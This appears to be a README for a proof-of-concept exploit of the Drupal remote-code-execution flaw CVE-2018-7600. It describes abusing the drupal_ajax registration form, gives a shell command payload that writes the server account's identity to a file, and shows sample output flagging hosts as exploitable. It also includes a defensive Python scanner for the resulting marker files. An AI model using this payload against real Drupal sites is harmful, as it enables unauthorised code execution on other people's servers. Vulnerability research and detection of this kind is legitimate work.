# Proof-Of-Concept for [CVE-2018-7600 / SA-CORE-2018-002](https://cve.circl.lu/cve/CVE-2018-7600)
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
## How it works
1. It sends a packet to the `drupal_ajax` wrapper to register a user, which allows the `exec` markup to be used to run bash. This PoC writes the user name and id to `abcde.txt`.
```bash
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
```
2. Checks `http*://example.com/abcde.txt`
```bash
[!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
[?] Enter file name (example: /root/file/hosts.txt): hosts.txt
[+] https://example.com/ Possibly exploitable
[~] Checking... https://example.com/abcde.text
[+] https://example.com/ Exploitable
[+] UID: 33 Name: www-data
[+] Deleting... https://example.com/abcde.text
```
## Payloads
`%s` = file name

User ID, PID, and Group Payload
```bash
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s
```
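A defender-side check for the artifact described above, as an added example that is not part of the original PoC: it sweeps a web document root for files whose whole content is the payload's output line, whatever file name was substituted for `%s`. The function names and the 1 KiB size cutoff are assumptions made for this example.

```python
import os
import re
import sys
from pathlib import Path

# Output format of the page's payload:
#   echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s
MARKER = re.compile(
    rb"^Name: (?P<name>[^\s:]+) UID: (?P<uid>\d+) Groups: (?P<groups>[^\r\n]*)\r?\n?$"
)
MAX_SIZE = 1024  # assumption: the marker is one short line, so skip larger files


def parse_marker(data: bytes):
    """Return the account details if data is exactly one marker line, else None."""
    m = MARKER.match(data)
    if not m:
        return None
    return {
        "name": m["name"].decode("utf-8", "replace"),
        "uid": int(m["uid"]),
        "groups": m["groups"].decode("utf-8", "replace").split(),
    }


def scan_docroot(docroot):
    """Walk docroot and return (relative path, details) for every marker file."""
    root = Path(docroot)
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = Path(dirpath) / fname
            try:
                if path.is_symlink() or path.stat().st_size > MAX_SIZE:
                    continue
                details = parse_marker(path.read_bytes())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if details:
                hits.append((str(path.relative_to(root)), details))
    return sorted(hits, key=lambda hit: hit[0])


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, d in scan_docroot(target):
        print(f"[!] {rel}: command ran as {d['name']} (uid {d['uid']}), groups {d['groups']}")
```

The sample output above shows the PoC deleting the file after its check, so an empty result does not show that a host was never probed.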
## Thanks to
- Thanks to [Vitalii Rudnykh](https://github.com/a2u)
## Provided only for educational or information purposes.
```
[4.0K] /data/pocs/1603107e2cc126160ee68195a47f64fd6c878bff
├── [5.7K] exploiter.py
├── [ 20] hosts.txt
├── [1.0K] LICENSE
├── [ 180] notes.md
├── [1.4K] README.md
├── [ 17] requirements.txt
└── [ 60] todo.md
0 directories, 7 files
```